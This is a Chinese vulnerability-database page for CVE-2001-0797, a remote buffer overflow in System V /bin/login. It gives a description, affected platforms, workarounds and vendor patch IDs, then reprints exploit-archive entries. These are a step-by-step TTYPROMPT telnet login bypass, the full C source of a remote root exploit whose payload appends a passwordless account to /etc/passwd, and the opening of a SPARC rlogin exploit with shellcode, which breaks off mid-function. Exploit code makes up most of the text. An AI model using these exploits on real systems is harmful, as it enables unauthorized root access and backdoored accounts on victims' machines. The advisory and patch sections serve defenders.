CVE-2001-0797
CVSS10.0
发布时间 :2001-12-12 00:00:00
修订时间 :2016-10-17 22:11:57
NMCOEPS    

[原文]Buffer overflow in login in various System V based operating systems allows remote attackers to execute arbitrary commands via a large number of arguments through services such as telnet and rlogin.


[CNNVD]System V系统Login远程缓冲区溢出漏洞(CNNVD-200112-095)

        
        一些应用程序使用login认证登录系统。源于System V的login含有一个可远程被利用的缓冲区溢出漏洞。攻击者可以利用这一漏洞获得服务器的root权限。
        一些源于System Vlogin的实现使用户可以向该进程提交具体参数,如环境变量。许多缓冲区被用来存放这些参数。但是程序在接受的参数数目检查过程中存在一个漏洞,可导致缓冲区数组发生溢出。
        大多数系统中login没有设置suid属性;因此它以调用它的用户的身份运行。如果调用login的应用程序为suid (或sgid) root,那么本地用户就可以获得root用户的权限。如果权限比这些用户大的应用程序,如telnetd或rlogind调用login时,用户就可以利用这一漏洞获得该程序的权限。如果该程序为telnetd或rlogind,用户就可以获得root权限。
        由于in.telnetd和in.rlogind可以通过网络提供服务,所以没有本地帐号的远程攻击者也可以利用本漏洞获得该系统的root权限。
        目前已发现了一个攻击代码,且该代码可能正在流传。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/o:sco:openserver:5.0.3
cpe:/o:sco:openserver:5.0.4
cpe:/o:sco:openserver:5.0.5
cpe:/o:sco:openserver:5.0.6
cpe:/o:sun:solaris:2.6::x86
cpe:/o:sun:solaris:8.0::x86
cpe:/o:sun:solaris:2.5::x86
cpe:/o:sun:solaris:7.0::x86
cpe:/o:sun:solaris:2.4::x86
cpe:/o:sco:openserver:5.0.1
cpe:/o:sco:openserver:5.0.2
cpe:/o:sgi:irix:3.3
cpe:/o:sun:solaris:2.5.1::ppc
cpe:/o:ibm:aix:4.3IBM AIX 4.3
cpe:/o:ibm:aix:5.1IBM AIX 5.1
cpe:/o:sun:solaris:2.5
cpe:/o:sun:solaris:7.0
cpe:/o:sun:solaris:2.4
cpe:/o:sun:solaris:2.1
cpe:/o:sun:solaris:2.6
cpe:/o:sun:solaris:8.0
cpe:/o:sun:solaris:2.3
cpe:/o:sun:solaris:2.5.1::x86
cpe:/o:sun:solaris:2.0
cpe:/o:hp:hp-ux:10.00HP HP-UX 10.00
cpe:/o:hp:hp-ux:11.11HP-UX 11.11
cpe:/o:sco:openserver:5.0
cpe:/o:sun:solaris:2.2
cpe:/o:hp:hp-ux:10.20HP HP-UX 10.20
cpe:/o:hp:hp-ux:10.24HP HP-UX 10.24
cpe:/o:ibm:aix:4.3.1IBM AIX 4.3.1
cpe:/o:hp:hp-ux:10.01HP HP-UX 10.01
cpe:/o:ibm:aix:4.3.2IBM AIX 4.3.2
cpe:/o:sgi:irix:3.3.3
cpe:/o:sun:solaris:2.5.1
cpe:/o:sgi:irix:3.3.1
cpe:/o:sgi:irix:3.3.2
cpe:/o:sgi:irix:3.2
cpe:/o:sco:openserver:5.0.6a
cpe:/o:hp:hp-ux:10.10HP HP-UX 10.10
cpe:/o:hp:hp-ux:11.00HP-UX 11.00
cpe:/o:hp:hp-ux:11.0.4HP HP-UX 11.0.4
cpe:/o:ibm:aix:4.3.3IBM AIX 4.3.3

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:2025System V login Buffer Overflow
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0797
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0797
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200112-095
(官方数据源) CNNVD

- 其它链接及资源

ftp://patches.sgi.com/support/free/security/advisories/20011201-01-I
(UNKNOWN)  SGI  20011201-01-I
ftp://stage.caldera.com/pub/security/openserver/CSSA-2001-SCO.40/CSSA-2001-SCO.40.txt
(UNKNOWN)  CALDERA  CSSA-2001-SCO.40
http://marc.info/?l=bugtraq&m=100844757228307&w=2
(UNKNOWN)  BUGTRAQ  20011214 Sun Solaris login bug patches out
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/213
(UNKNOWN)  SUN  00213
http://www-1.ibm.com/support/search.wss?rs=0&q=IY26221&apar=only
(UNKNOWN)  AIXAPAR  IY26221
http://www.cert.org/advisories/CA-2001-34.html
(VENDOR_ADVISORY)  CERT  CA-2001-34
http://www.kb.cert.org/vuls/id/569272
(UNKNOWN)  CERT-VN  VU#569272
http://www.securityfocus.com/archive/1/246487
(VENDOR_ADVISORY)  BUGTRAQ  20011219 Linux distributions and /bin/login overflow
http://www.securityfocus.com/bid/3681
(VENDOR_ADVISORY)  BID  3681
http://xforce.iss.net/alerts/advise105.php
(VENDOR_ADVISORY)  ISS  20011212 Buffer Overflow in /bin/login
http://xforce.iss.net/static/7284.php
(VENDOR_ADVISORY)  XF  telnet-tab-bo(7284)

- 漏洞信息

System V系统Login远程缓冲区溢出漏洞
危急 边界条件错误
2001-12-12 00:00:00 2005-08-17 00:00:00
远程  
        
        一些应用程序使用login认证登录系统。源于System V的login含有一个可远程被利用的缓冲区溢出漏洞。攻击者可以利用这一漏洞获得服务器的root权限。
        一些源于System Vlogin的实现使用户可以向该进程提交具体参数,如环境变量。许多缓冲区被用来存放这些参数。但是程序在接受的参数数目检查过程中存在一个漏洞,可导致缓冲区数组发生溢出。
        大多数系统中login没有设置suid属性;因此它以调用它的用户的身份运行。如果调用login的应用程序为suid (或sgid) root,那么本地用户就可以获得root用户的权限。如果权限比这些用户大的应用程序,如telnetd或rlogind调用login时,用户就可以利用这一漏洞获得该程序的权限。如果该程序为telnetd或rlogind,用户就可以获得root权限。
        由于in.telnetd和in.rlogind可以通过网络提供服务,所以没有本地帐号的远程攻击者也可以利用本漏洞获得该系统的root权限。
        目前已发现了一个攻击代码,且该代码可能正在流传。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 立刻停止telnet和rlogin以及其他使用login进行认证的服务。
         如果您正在使用OpenSSH,但是打开了"UseLogin"开关,您应该编辑服务器配置文件,将所有`UseLogin'指令设置为`UseLogin no'。
        
        * 换用更安全的远程访问工具SSH或者OpenSSH。
         SSH地址:
        http://www.ssh.com

         OpenSSH地址:
        http://www.openssh.org

        * 如果你无法禁用telnet/rlogin服务,也可使用TCP wrapper、防火墙或包过滤技术禁止不可信IP对23/TCP端口(telnet)和513/TCP端口(rlogin)访问。
        厂商补丁:
        Caldera
        -------
        Caldera 公司已经为此发布了一个安全公告(CSSA-2001-SCO.40):
        
        http://stage.caldera.com/support/security/

        
        针对SCO OpenServer的二进制补丁也已经发布:
         SCO OpenServer 5.0.5以及更早版本 erg711877.505.tar.Z
         SCO OpenServer 5.0.6 erg711877.506.tar.Z
        
        上述补丁可以在下列目录下下载:
        ftp://stage.caldera.com/pub/security/openserver/CSSA-2001-SCO.40/
        HP
        --
        HP-UX不会受到攻击,虽然HP-UX的确含有这一缓冲区溢出漏洞。目前这一缓冲区溢出漏洞已被HP修复。
        IBM
        ---
        IBM的AIX versions 4.3和5.1操作系统受此漏洞影响。AIX已为此提供了紧急补丁(efix),"tsmlogin_efix.tar.Z"可从下列地址下载:
        ftp://aix.software.ibm.com/aix/efixes/security
        AIX 5.1补丁编号为IY26221,即将发布。AIX 4.3补丁编号未定,因为新版4.3即将发布。 一旦官方补丁发布,FTP网站将更新"README"文件提供补丁信息和下载地址。
        SGI
        ---
        SGI调查发现只有IRIX 3.x存在此安全漏洞,其他IRIX版本(包括4.x,5.x,6.x)均不存在此漏洞。您应该尽快升级到最新版本的IRIX系统。
        Sun
        ---
        Sun已经提供了解决此安全漏洞的补丁。
        
        补丁ID:
         OS Version Patch ID
         __________ _________
         SunOS 5.8 111085-02
         SunOS 5.8_x86 111086-02
         SunOS 5.7 112300-01
         SunOS 5.7_x86 112301-01
         SunOS 5.6 105665-04
         SunOS 5.6_x86 105666-04
         SunOS 5.5.1 106160-02
         SunOS 5.5.1_x86 106161-02
        您可以使用下列链接来下载相应补丁:
        
        http://sunsolve.sun.com/pub-cgi/patchDownload.pl?target=<补丁ID>&method=h

        例如,对于代号为111085-02的补丁,您可以使用下列链接:
        
        http://sunsolve.sun.com/pub-cgi/patchDownload.pl?target=111085&method=h

- 漏洞信息 (57)

Solaris 2.6/7/8 (TTYPROMPT in.telnet) Remote Authentication Bypass (EDBID:57)
solaris remote
2002-11-02 Verified
0 Jonathan S.
N/A [点击下载]
Solaris TTYPROMPT Security Vulnerability (Telnet)

This vulnerability is very simple to exploit, since it does not require 
any code to be compiled by an attacker. The vulnerability only requires 
the attacker to simply define the environment variable TTYPROMPT to a 
6-character string, inside telnet. Jonathan believes this overflows an 
integer inside login, which specifies whether the user has been 
authenticated (just a guess).

Once connected to the remote host, you must type the username, followed 
by 64 " c"s, and a literal "\n". You will then be logged in as the user 
without any password authentication. This should work with any account 
except root (unless remote root login is allowed). 

Example: 
coma% telnet 
telnet> environ define TTYPROMPT abcdef 
telnet> o localhost 

SunOS 5.8 

bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n 
Last login: whenever 
$ whoami bin 

# milw0rm.com [2002-11-02]
		

- 漏洞信息 (346)

Solaris /bin/login Remote Root Exploit (SPARC/x86) (EDBID:346)
linux remote
2001-12-20 Verified
23 Teso
N/A [点击下载]
/*
 * 7350963 - /bin/login remote root explot SPARC/x86
 *
 * TESO CONFIDENTIAL - SOURCE MATERIALS
 *
 * This is unpublished proprietary source code of TESO Security.
 *
 * (C) COPYRIGHT TESO Security, 2001
 * All Rights Reserved
 *
 * bug found by scut 2001/12/20
 * thanks to halvar,scut,typo,random,edi,xdr.
 * special thanks to security.is.
 *
 * keep it private!
 * don't distribute!
 */

//#define X86_FULL_PACKAGE

#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <unistd.h>
#include <stdlib.h>

void usage()
{
  printf("usage: ./7350963 ip_of_the_victim\n");
}

void dump_hex(char *str,char *data,int len)
{
  int i;
  if(str)
    {
      printf("\n=======%s:%d========\n",str,len);
    }
  else
    {
      printf("\n=======================\n");
    }
  for(i=0; i < len ;i++)
    {
      printf("x%.2x\n", (data[i]&0xff));
    }
  printf("\n-----------------------\n");
  for(i=0; i < len ;i++)
    {
      if(data[i]==0x00)
	{
	  printf("|\n");
	}
      else
	{
	  printf("%c\n",data[i]);
	}
    }
  printf("\n");
  fflush(stdout);
}

int send_data(int sock,const char *send_data,int send_len)
{
  int wc;
  int rc;
  char recv_buf[1000];
  
  if(send_data && send_len > 0)
    {
      wc=send(sock,send_data,send_len,0);
    }
  rc=recv(sock,recv_buf,sizeof(recv_buf),0);
  
  if(rc > 0)
    {
      dump_hex("recv",recv_buf,rc);
    }
}

int main(int argc,char *argv[])
{
  int sock;
  struct sockaddr_in address;
  int i;
  
  char send_data_1[]=
  {
    0xff,0xfd,0x03,
    0xff,0xfb,0x18,
    0xff,0xfb,0x1f,
    0xff,0xfb,0x20,
    0xff,0xfb,0x21,
    0xff,0xfb,0x22,
    0xff,0xfb,0x27,
    0xff,0xfd,0x05,
    0xff,0xfb,0x23
  };
  char send_data_2[]=
  {
    0xff,0xfa,0x1f,0x00,0x50,0x00,0x18,
    0xff,0xf0,
    0xff,0xfc,0x24
  };
  char send_data_3[]=
  {
    0xff,0xfd,0x01,
    0xff,0xfc,0x01
  };
  
  char str_buffer[1024*30];
  int str_buffer_pos=0;
  char str_end[2]={0xd,0x0};
  
  char *env_str;
  int env_str_len;
  char env_1[4]={0xff,0xfa,0x18,0x00};
  char *terminal_name="xterm-debian";
  char env_2[6]={0xff,0xf0,0xff,0xfa,0x23,0x00};
  char *display="matter:0.0";
  char env_3[7]={0xff,0xf0,0xff,0xfa,0x27,0x00,0x00};
  char *display_var="DISPlAY";
  char display_delimiter[1]={0x01};
  char *display_value="matter:0.0";
  char *environ_str;
  int environ_str_len;
  int env_cur_pos=0;
  int env_num;
  
  char env_4[2]={0xff,0xf0};
  char  exploit_buffer[]="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\\r\n";
  char login_buffer[]=  "ji1=A ji2=A ji3=A ji4=A ji5=A ji6=A ji7=A ji8=A ji9=Z ji10=z\\\r\n\
                         ji11=B ji12=A ji13=A ji14=b ji15=A ji16=A ji17=A ji18=A ji19=B ji20=b\\\r\n\
                         ji21=C ji22=A ji23=A ji24=c ji25=A ji26=A ji27=A ji28=A ji29=C ji30=c\\\r\n\
                         ji32=D ji32=A ji33=A ji34=d ji35=A ji36=A ji37=A ji38=A ji39=D ji40=d\\\r\n\
                         ji41=E ji42=A ji43=A ji44=e j";
  char realfree_edx[]={0x83,0x83,0x83,0x83}; //0xdf9d6361 <realfree+81>: test   $0x1,%dl¸¦ ³Ñ±â±â À§Çؼ­
  char login_buffer1[]="=A j";
  
#ifdef X86_FULL_PACKAGE
  char t_delete_edi_plus_0x8[]={0x2f,0x80,0x06,0x08};
#else
  char t_delete_edi_plus_0x8[]={0x27,0x80,0x06,0x08};
#endif
  char t_delete_edi_plus_0xa[]="=A j";
  char t_delete_edi_plus_0x10[]={0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff};
  char login_buffer1_0[]="=A ji48=A j ";
#ifdef X86_FULL_PACKAGE
  char t_delete_edi_plus_0x20[]={0xf0,0x55,0x6,0x08};
#else
  char t_delete_edi_plus_0x20[]={0xe8,0x55,0x6,0x08};
#endif
  char login_buffer1_1[]="=\\\r\n\ji51=F ji52=A ji53=A ji54=f ji55=A ji56=A j=iheol i58=";
#ifdef X86_FULL_PACKAGE
  char t_delete2_param1[]={0x29,0x80,0x06,0x08};
#else
  char t_delete2_param1[]={0x21,0x80,0x06,0x08};
#endif
  char login_buffer1_2[]="6=8";
  char link_pos[]={0x97,0xff,0xff,0xff,0xff,0xff,0xff};
  //ù¹ø° A -1 ÀÓ
  char login_buffer2[]="A=AB";
  //    0x080654d4->0x080656ac at 0x000054d4: .got ALLOC LOAD DATA HAS_CONTENTS
  //0x80655a4 <_GLOBAL_OFFSET_TABLE_+208>:  0xdf9bd0b8 <strncpy>
  //(gdb) print/x 0x80655a4 - 0x20
  //$1 = 0x8065584
#ifdef X86_FULL_PACKAGE
  char t_delete2_edi_plus_0x8[]={0x90,0x55,0x06,0x08}; //strncpy-0x20,ecx
#else
  char t_delete2_edi_plus_0x8[]={0x84,0x55,0x06,0x08}; //strncpy-0x20,ecx
#endif
  char login_buffer2_0[]="GHIJ";
  char t_delete2_edi_plus_0x10[]={0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff};
  char login_buffer2_1[]="OPQRSTUVWXYZ";
  
  //0x806810d <inputline+780>:       'A' <repeats 82 times>, "\n"
#ifdef X86_FULL_PACKAGE
  char t_delete2_edi_plus_0x20[]={0x06,0x81,0x06,0x08}; //shellcode,eax
#else
  char t_delete2_edi_plus_0x20[]={0xfe,0x80,0x06,0x08}; //shellcode,eax
#endif
  
  //0x8067e01 <inputline>: "heowahfoihewobhfoiewhiofhoewhofhoeiwhofwhofhiewwhfoiew
  char login_buffer2_2[]="efghijklmnopqrstuvwxyz0123456789A\\\r\n\
    jk11=A jm21=C nj31=A jo41=A pi51=A jq61=A jr71=A js81=g jt91=A ju01=A jv11=A 
    jw21=B jy"; //31=A z";//4=A k2=A k3=A k";
  
#ifdef X86_FULL_PACKAGE
  //char strncpy_src[]={0xf9,0x3b,0x05,0x08};
  char strncpy_src[]={0x31,0x80,0x06,0x08};
  
#else
  char strncpy_src[]={0xf1,0x3b,0x05,0x08};
  
#endif
  
  char env_buffer[]="hi1=A hi2=A hi3=A hi";
  char pam_input_output_eax[]={0x48,0x8a,0x06,0x08}; //0x8068a48
  char env_buffer0[]="hi5=A hi6=A hi7=A hi";
  
#ifdef X86_FULL_PACKAGE
  char free_dest_buffer[]={0x31,0x80,0x06,0x08};
  
#else
  char free_dest_buffer[]={0x29,0x80,0x06,0x08};
#endif
  
  char env_buffer2[]="zi9=";
#ifdef X86_FULL_PACKAGE
  char free_dest_buffer2[]={0x31,0x80,0x06,0x08};
  
#else
  char free_dest_buffer2[]={0x29,0x80,0x06,0x08};
  
#endif
  
  char exp_buffer0[]="hello";
  char jmp_code[]={0xeb,0xc};
  char exp_buffer1[]="\\\r\nhhhhhhhhhhh";
  char shellcode[]=
  {
    0xeb,0x1d,
    0x5e,           /*popl   %esi*/
    0x33,0xc0,       /*xorl   %eax,%eax*/
    0x50,           /*pushl  %eax - ,0x0*/
#ifdef X86_FULL_PACKAGE
    0x68,0x46,0x81,0x06,0x08,
    0x68,0x43,0x81,0x06,0x08,
    0x68,0x40,0x81,0x06,0x08,
    0x68,0x38,0x81,0x06,0x08,
#else
    0x68,0x3e,0x81,0x06,0x08,
    0x68,0x3b,0x81,0x06,0x08,
    0x68,0x38,0x81,0x06,0x08,
    0x68,0x30,0x81,0x06,0x08,
#endif
#ifdef X86_FULL_PACKAGE
    0xe8,0x25,0xa0,0xfe,0xff,0xff, /*call execve: 0xfffe9fee*/
#else
    0xe8,0x2e,0xa0,0xfe,0xff,0xff, /*call execve: 0xfffe9fee*/
#endif
    0xe8,0xde,0xff,0xff,0xff,0xff,0xff,0xff /*call again*/
  };
  char exec_argv0[]="/bin/sh";
  char exec_argv1[]="sh";
  char exec_argv2[]="-c";
  char exec_argv3[]="/bin/echo met::463:1::/:/bin/sh>>/etc/passwd;";
  //"/bin/echo met::11652::::::>>/etc/shadow;";
  //"/bin/finger @210.111.69.137";
  //211.59.123.155";
  char extra_buffer[]="hihihiifhewiohfiowehfiohweiofhiowehfoihefe\\\r\n";
#ifdef X86_FULL_PACKAGE
  char free_dest_buffer3[]={0x31,0x80,0x06,0x08};
#else
  char free_dest_buffer3[]={0x29,0x80,0x06,0x08};
#endif
  char env_buffer5[]="70=b \\\r\n\hr371=b hs372=";
  char pam_input_output_eax2[]={0xf5,0x3b,0x05,0x08};
  char env_buffer5_0[]="473=";
  char pam_get_authtok_eax[]={0xf6,0x3b,0x05,0x08}; //0x8053bfa Àӽú¯Åë
  char pam_get_data_esi[]={0xa8,0xb1,0x06,0x08};//0x806b1a8  display="";  terminal_name="";
  
  if (argc < 2)
    {
      usage();
      exit(-1);
    }
  
  env_str_len= sizeof(env_1) + strlen(terminal_name) + sizeof(env_2)+strlen(display) + sizeof(env_3) + strlen(display_var) + sizeof(display_delimiter) + strlen(display_value) + sizeof(env_4);
  
  env_str=(char *)calloc(1,env_str_len);
  if(env_str)
    {
      env_cur_pos=0;
      memcpy(env_str+env_cur_pos,env_1,sizeof(env_1));
      env_cur_pos += sizeof(env_1);
      memcpy(env_str + env_cur_pos,terminal_name,strlen(terminal_name));
      env_cur_pos += strlen(terminal_name);
      memcpy(env_str + env_cur_pos,env_2,sizeof(env_2));
      env_cur_pos += sizeof(env_2);
      memcpy(env_str + env_cur_pos,display,strlen(display));
      env_cur_pos += strlen(display);
      memcpy(env_str + env_cur_pos,env_3,sizeof(env_3));
      env_cur_pos += sizeof(env_3);
      memcpy(env_str + env_cur_pos,display_var,strlen(display_var));
      env_cur_pos += strlen(display_var);
      memcpy(env_str + env_cur_pos,display_delimiter,sizeof(display_delimiter));
      env_cur_pos+=sizeof(display_delimiter);
      memcpy(env_str + env_cur_pos,display_value,strlen(display_value));
      env_cur_pos += strlen(display_value);
      memcpy(env_str + env_cur_pos,env_4,sizeof(env_4));
      env_cur_pos += sizeof(env_4);
    }
  
  /*socket operation*/
  sock=socket(AF_INET,SOCK_STREAM,0);
  if(sock < 0)
    {
      perror("socket");
      return -1;
    }
  address.sin_family=AF_INET;
  address.sin_port=htons(23);
  //inet_pton(AF_INET,argv[1],&address.sin_addr); //on some system no inet_pton exists
  address.sin_addr.s_addr=inet_addr(argv[1]);
  
  if(connect(sock,(struct sockaddr *)&address,sizeof(address))<0)
    {
      perror("connect");
      return -1;
    }
  send_data(sock,NULL,0);
  send_data(sock,send_data_1,sizeof(send_data_1));
  send_data(sock,send_data_2,sizeof(send_data_2));
  
  //dump_hex("env",env_str,env_cur_pos);
  send_data(sock,env_str,env_cur_pos);
  free(env_str);
  
  send_data(sock,send_data_3,sizeof(send_data_3));
  
  str_buffer_pos=0;
  
  memcpy(str_buffer + str_buffer_pos,exploit_buffer,strlen(exploit_buffer));
  str_buffer_pos += strlen(exploit_buffer);
  
  strcpy(str_buffer + str_buffer_pos,login_buffer);
  str_buffer_pos += strlen(login_buffer);
  
  memcpy(str_buffer + str_buffer_pos,realfree_edx,sizeof(realfree_edx));
  str_buffer_pos += sizeof(realfree_edx);
  
  strcpy(str_buffer + str_buffer_pos,login_buffer1);
  str_buffer_pos += strlen(login_buffer1);
  
  memcpy(str_buffer + str_buffer_pos,t_delete_edi_plus_0x8,sizeof(t_delete_edi_plus_0x8));
  str_buffer_pos += sizeof(t_delete_edi_plus_0x8);
  
  memcpy(str_buffer + str_buffer_pos,t_delete_edi_plus_0xa,strlen(t_delete_edi_plus_0xa));
  str_buffer_pos += strlen(t_delete_edi_plus_0xa);
  
  memcpy(str_buffer + str_buffer_pos,t_delete_edi_plus_0x10,sizeof(t_delete_edi_plus_0x10));
  str_buffer_pos += sizeof(t_delete_edi_plus_0x10);
  
  strcpy(str_buffer + str_buffer_pos,login_buffer1_0);
  str_buffer_pos += strlen(login_buffer1_0);
  
  memcpy(str_buffer + str_buffer_pos,t_delete_edi_plus_0x20,sizeof(t_delete_edi_plus_0x20));
  str_buffer_pos += sizeof(t_delete_edi_plus_0x20);
  
  strcpy(str_buffer + str_buffer_pos,login_buffer1_1);
  str_buffer_pos += strlen(login_buffer1_1);
  
  memcpy(str_buffer + str_buffer_pos,t_delete2_param1,sizeof(t_delete2_param1));
  str_buffer_pos += sizeof(t_delete2_param1);
  
  strcpy(str_buffer + str_buffer_pos,login_buffer1_2);
  str_buffer_pos += strlen(login_buffer1_2);
  
  memcpy(str_buffer + str_buffer_pos,link_pos,sizeof(link_pos));
  str_buffer_pos += sizeof(link_pos);
  
  strcpy(str_buffer + str_buffer_pos,login_buffer2);
  str_buffer_pos += strlen(login_buffer2);
  
  memcpy(str_buffer + str_buffer_pos,t_delete2_edi_plus_0x8,sizeof(t_delete2_edi_plus_0x8));
  str_buffer_pos += sizeof(t_delete2_edi_plus_0x8);
  
  strcpy(str_buffer + str_buffer_pos,login_buffer2_0);
  str_buffer_pos += strlen(login_buffer2_0);
  
  memcpy(str_buffer + str_buffer_pos,t_delete2_edi_plus_0x10,sizeof(t_delete2_edi_plus_0x10));
  str_buffer_pos += sizeof(t_delete2_edi_plus_0x10);
  
  strcpy(str_buffer + str_buffer_pos,login_buffer2_1);
  str_buffer_pos += strlen(login_buffer2_1);
  
  memcpy(str_buffer + str_buffer_pos,t_delete2_edi_plus_0x20,sizeof(t_delete2_edi_plus_0x20));
  str_buffer_pos +=  sizeof(t_delete2_edi_plus_0x20);
  
  strcpy(str_buffer + str_buffer_pos,login_buffer2_2);
  str_buffer_pos += strlen(login_buffer2_2);
  
  memcpy(str_buffer + str_buffer_pos,strncpy_src,sizeof(strncpy_src));
  str_buffer_pos += sizeof(strncpy_src);
  
  memcpy(str_buffer + str_buffer_pos,env_buffer,strlen(env_buffer));
  str_buffer_pos += strlen(env_buffer);
  
  memcpy(str_buffer + str_buffer_pos,pam_input_output_eax,sizeof(pam_input_output_eax));
  str_buffer_pos += sizeof(pam_input_output_eax);
  
  memcpy(str_buffer + str_buffer_pos,env_buffer,strlen(env_buffer0));
  str_buffer_pos += strlen(env_buffer0);
  
  memcpy(str_buffer + str_buffer_pos,free_dest_buffer,sizeof(free_dest_buffer));
  str_buffer_pos += sizeof(free_dest_buffer);
  
  memcpy(str_buffer + str_buffer_pos,env_buffer2,strlen(env_buffer2));
  str_buffer_pos += strlen(env_buffer2);
  
  memcpy(str_buffer + str_buffer_pos,free_dest_buffer2,sizeof(free_dest_buffer2));
  str_buffer_pos += sizeof(free_dest_buffer2);
  
  strcpy(str_buffer + str_buffer_pos,exp_buffer0);
  str_buffer_pos    += strlen(exp_buffer0);
  
  memcpy(str_buffer + str_buffer_pos,jmp_code,sizeof(jmp_code));
  str_buffer_pos    += sizeof(jmp_code);
  
  strcpy(str_buffer + str_buffer_pos,exp_buffer1);
  str_buffer_pos    += strlen(exp_buffer1);
  
  memcpy(str_buffer + str_buffer_pos,shellcode,sizeof(shellcode));
  str_buffer_pos    += sizeof(shellcode);
  
  strcpy(str_buffer + str_buffer_pos,exec_argv0);
  str_buffer_pos    += strlen(exec_argv0)+1;
  
  strcpy(str_buffer + str_buffer_pos,exec_argv1);
  str_buffer_pos    += strlen(exec_argv1)+1;
  
  strcpy(str_buffer + str_buffer_pos,exec_argv2);
  str_buffer_pos    += strlen(exec_argv2)+1;
  
  strcpy(str_buffer + str_buffer_pos,exec_argv3);
  str_buffer_pos    += strlen(exec_argv3)+1;
  
  memcpy(str_buffer + str_buffer_pos,str_end,strlen(str_end));
  str_buffer_pos += strlen(str_end);
  
  {
    char buf[100];
    fgets(buf,100,stdin);
  }
  printf("sending login!\n");
  fflush(stdout);
  send_data(sock,str_buffer,str_buffer_pos);
  send_data(sock,NULL,0);
  printf("\n\n\npress return to send password\n...");
  
  {
    char buf[100];
    fgets(buf,100,stdin);
  }
  send_data(sock,str_buffer,strlen(str_buffer)+1);
  printf("\n\n\nwaiting for the realfree & t_delete to be called!\n...\n\n");
  fflush(stdout);
  sleep(30);
  return 42;
}


// milw0rm.com [2001-12-20]
		

- 漏洞信息 (716)

Solaris 2.5.1/2.6/7/8 rlogin /bin/login Buffer Overflow Exploit (SPARC) (EDBID:716)
solaris remote
2004-12-24 Verified
513 Marco Ivaldi
N/A [点击下载]
/*
 * $Id: raptor_rlogin.c,v 1.1 2004/12/04 14:44:38 raptor Exp $
 *
 * raptor_rlogin.c - (r)login, Solaris/SPARC 2.5.1/2.6/7/8
 * Copyright (c) 2004 Marco Ivaldi <raptor@0xdeadbeef.info>
 *
 * Buffer overflow in login in various System V based operating systems 
 * allows remote attackers to execute arbitrary commands via a large number 
 * of arguments through services such as telnet and rlogin (CVE-2001-0797).
 *
 * Dedicated to my beautiful croatian ladies (hello Zrinka!) -- August 2004
 *
 * This remote root exploit uses the (old) System V based /bin/login 
 * vulnerability via the rlogin attack vector, returning into the .bss 
 * section to effectively bypass the non-executable stack protection
 * (noexec_user_stack=1 in /etc/system).
 *
 * Many thanks to scut <scut@nb.in-berlin.de> (0dd) for his elite pam_handle_t
 * technique (see 7350logout.c), also thanks to inode <inode@deadlocks.info>.
 *
 * Usage (must be root):
 * # gcc raptor_rlogin.c -o raptor_rlogin -Wall
 * [on solaris: gcc raptor_rlogin.c -o raptor_rlogin -Wall -lxnet]
 * # ./raptor_rlogin -h 192.168.0.50
 * [...]
 * # id;uname -a;uptime;
 * uid=0(root) gid=0(root)
 * SunOS merlino 5.8 Generic_108528-13 sun4u sparc SUNW,Ultra-5_10
 *   7:45pm  up 12 day(s), 18:42,  1 user,  load average: 0.00, 0.00, 0.01
 * #
 *
 * Vulnerable platforms (SPARC):
 * Solaris 2.5.1 without patch 106160-02 [untested]
 * Solaris 2.6 without patch 105665-04 [untested]
 * Solaris 7 without patch 112300-01 [untested]
 * Solaris 8 without patch 111085-02 [tested]
 */

#include <errno.h>
#include <fcntl.h>
#include <netdb.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define	INFO1	"raptor_rlogin.c - (r)login, Solaris/SPARC 2.5.1/2.6/7/8"
#define	INFO2	"Copyright (c) 2004 Marco Ivaldi <raptor@0xdeadbeef.info>"

#define	BUFSIZE	3000			// max size of the evil buffer
#define	RETADDR	0x27184			// retaddr, should be reliable
#define	TIMEOUT	10			// net_read() default timeout
#define	CMD	"id;uname -a;uptime;\n"	// executed upon exploitation

char sc[] = /* Solaris/SPARC special shellcode (courtesy of inode) */
/* execve() + exit() */
"\x94\x10\x20\x00\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc"
"\xa2\x14\x63\x68\xd4\x23\xbf\xfc\xe2\x23\xbf\xf8\xe0\x23\xbf\xf4"
"\x90\x23\xa0\x0c\xd4\x23\xbf\xf0\xd0\x23\xbf\xec\x92\x23\xa0\x14"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x82\x10\x20\x01\x91\xd0\x20\x08";

char sparc_nop[] = /* Solaris/SPARC special nop (xor %sp, %sp, %o0) */
"\x90\x1b\x80\x0e";

/* prototypes */
int	exploit_addchar(unsigned char *ww, unsigned char wc);
void	fatalerr(char *func, char *error, int fd);
int	net_connect(char *host, int port, int timeout);
int	net_read(int fd, char *buf, int size, int timeout);
int	net_resolve(char *host);
int	sc_copy(unsigned char *buf, char *str, long len);
void	set_val(char *buf, int pos, int val);
void	shell(int fd);
void	usage(char *progname);

/*
 * main()
 */
int main(int argc, char **argv)
{
	char	buf[BUFSIZE], *p = buf;
	char	c, *host = NULL, term[] = "vt100/9600";
	int	fd, i, found, len;
	int	timeout = TIMEOUT, debug = 0;

	/* print exploit information */
